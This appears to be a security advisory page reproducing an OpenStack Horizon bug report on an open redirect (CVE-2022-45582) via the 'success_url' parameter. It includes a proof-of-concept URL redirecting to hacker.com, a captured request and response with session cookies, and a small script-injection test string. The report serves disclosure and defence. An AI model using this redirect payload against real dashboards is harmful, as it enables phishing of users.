Headline

CVE-2022-45582: Bug #1982676 “Open redirect / phishing attack via “success_url” ...” : Bugs : OpenStack Dashboard (Horizon)

Open Redirect vulnerability in Horizon Web Dashboard 19.4.0 thru 20.1.4 via the success_url parameter.

1 year ago

#csrf #vulnerability #web #ubuntu #linux #apache #firefox

The “success_url” param is used when updating the project snapshot and it lacks sanitizing the input URL that allows an attacker to redirect the user to another website.

For instance, the URL below will redirect you to https://hacker.com:

https://xxx.com/project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https://hacker.com

The attacker can send this link to the user and when they click on the “Update” button the request and response will look like this:

[+] Request

POST /project/snapshots/a54c1d97-d354-4171-9602-52fdf0949e83/update/?success_url=https%3A%2F%2Fhacker.coom HTTP/1.1
Host: xxx.com
Cookie: _ga_0CPB5J3KQB=GS1.1.1656302247.2.0.1656302247.0; _ga=GA1.1.2043123211.1656300031; login_region=default; login_domain=""; theme=default; sessionid=yl7fjfh7dhpwduodbxb4mjxng46qowgh; csrftoken=j5WQq7woP7OJGKnbTAa6cbQ8zyEgUhWjIZRu4vDMNgbFbNIl5bAe7V2PESYSbUYI; recent_project=dfcf9f80229f400a9e7ac53782be9e39
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
<====================>SNIP<====================>

csrfmiddlewaretoken=9wp8nOC21UvAGFxqG0qa1DjRsdKg26P0yqkM1cJqZ3SwbISASBQiWnvyxx4SjJRp&name=snapshot+for+%3Cscript%3Ealert%281%29%3C%2Fscript%3E+%22+%27%5Cu0022%C3%A2%5Cx04&description=

[+] Response

HTTP/1.1 302 Found
date: Tue, 12 Jul 2022 10:14:38 GMT
server: Apache/2.4.41 (Ubuntu)
location: https://hacker.com
content-length: 0
x-horizon-location: https://hacker.com
x-frame-options: SAMEORIGIN
vary: Accept-Language,Cookie
content-language: en
<====================>SNIP<====================>

Impact: The attacker can trick redirect users to the cloned website to steal information, a so-called Phishing Attack.

CWE-601: URL Redirection to Untrusted Site (‘Open Redirect’)
http://cwe.mitre.org/data/definitions/601.html

I have tested it on OpenStack Xena so the Horizon dashboard could be between version 20.0.0 to 20.1.2. I haven’t tested the bug on other versions.
Unfortunately, I have discovered this bug when pen-testing a black box project so I do not have the log file. Hope my information helps you to understand the bug.